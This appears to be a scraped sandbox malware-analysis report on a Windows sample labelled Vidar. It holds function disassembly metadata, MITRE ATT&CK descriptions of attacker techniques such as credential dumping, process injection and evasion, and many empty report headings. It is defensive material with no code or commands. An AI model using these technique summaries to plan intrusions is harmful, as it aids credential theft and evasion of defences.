Uniqueness

Uniqueness Score: -1.00%

Function 004041E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00404217

Part of subcall function 0049B347: std::ios_base::_Tidy.LIBCPMT ref: 0049B368

Strings

@A@, xrefs: 004041FA
A@, xrefs: 004041EC

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: @A@$A@
API String ID: 3167631304-3090660310
Opcode ID: e1432c0684c43e36d02e92e24d96ba77cfc77e8f4710dd6c85118a5264989d1f
Instruction ID: 88cf9c7263f093331865935adac68eaa63cbb1bb14d31e9a1b9d2fa4ed31915f
Opcode Fuzzy Hash: e1432c0684c43e36d02e92e24d96ba77cfc77e8f4710dd6c85118a5264989d1f
Instruction Fuzzy Hash: F2F05EB46002019FC710CF14D6889A6BBA1EF95318B24C0ADD9450B366C7B6ED86CBE9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 0lm81UZm7Y.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Vidar

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre